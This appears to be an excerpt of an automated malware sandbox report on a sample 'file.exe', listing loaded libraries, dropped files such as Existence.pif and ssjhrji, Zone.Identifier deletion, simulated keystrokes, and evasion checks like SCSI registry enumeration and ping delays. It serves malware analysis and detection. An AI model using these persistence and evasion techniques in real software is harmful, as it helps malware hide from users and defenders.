        Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: oleacc.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: riched20.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: usp10.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: msls31.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: wsock32.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: ncryptsslp.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: napinsp.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: pnrpnsp.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: wshbth.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: nlaapi.dll
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Section loaded: winrnr.dll
        Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
        Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
        Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
        Source: C:\Windows\explorer.exe | Section loaded: webio.dll
        Source: C:\Windows\explorer.exe | Section loaded: cdprt.dll
        Source: C:\Windows\explorer.exe | Section loaded: networkexplorer.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: wsock32.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: version.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: winmm.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: mpr.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: userenv.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: dui70.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: duser.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: coreuicomponents.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: textshaping.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: edputil.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: explorerframe.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: windowscodecs.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: thumbcache.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: policymanager.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: msvcp110_win.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: dataexchange.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: d3d11.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: dcomp.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: dxgi.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: twinapi.appcore.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: windows.ui.fileexplorer.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: propsys.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: oleacc.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: assignedaccessruntime.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: xmllite.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: windows.fileexplorer.common.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: linkinfo.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: structuredquery.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: atlthunk.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: windows.storage.search.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: iconcodecservice.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: twinapi.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: ntshrui.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: cscapi.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: actxprxy.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Section loaded: networkexplorer.dll
        Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Window detected: Number of UI elements: 13
        Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_00735FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_00780315 push cs; retn 0077h (10_2_00780318)
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_00750DE6 push ecx; ret (10_2_00750DF9)
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_004032AC push eax; ret (16_2_004032C2)
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_00780315 push cs; retn 0077h (16_2_00780318)
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_00750DE6 push ecx; ret (16_2_00750DF9)
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_0074D145 push esp; retf 0003h (16_2_0074D146)
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00AF0DE6 push ecx; ret (19_2_00AF0DF9)
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00AED145 push esp; retf 0003h (19_2_00AED146)

        Persistence and Installation Behavior

        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
        Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\ssjhrji

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\ssjhrji:Zone.Identifier read attributes | delete
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_007C26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_0074FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_007C26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_0074FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B626DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00AEFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
        Source: Existence.pif, 00000010.00000002.2288276292.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
        Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 466
        Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 471
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif API coverage: 4.8 %
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif API coverage: 0.3 %
        Source: C:\Users\user\AppData\Roaming\ssjhrji API coverage: 1.2 %
        Source: C:\Windows\explorer.exe TID: 4080 Thread sleep count: 341 > 30
        Source: C:\Windows\explorer.exe TID: 2128 Thread sleep count: 132 > 30
        Source: C:\Windows\explorer.exe TID: 1800 Thread sleep count: 76 > 30
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402910 FindFirstFileW,0_2_00402910
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0079E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_0079E472
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0079DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0079DC54
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007AA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_007AA087
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007AA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_007AA1E2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007AA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_007AA570
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0076C622 FindFirstFileExW,10_2_0076C622
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007A66DC FindFirstFileW,FindNextFileW,FindClose,10_2_007A66DC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007A7333 FindFirstFileW,FindClose,10_2_007A7333
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007A73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_007A73D4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0079D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0079D921
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007AA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_007AA087
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007AA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_007AA1E2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0079E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_0079E472
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007AA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_007AA570
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0076C622 FindFirstFileExW,16_2_0076C622
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007A66DC FindFirstFileW,FindNextFileW,FindClose,16_2_007A66DC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007A7333 FindFirstFileW,FindClose,16_2_007A7333
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007A73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_007A73D4
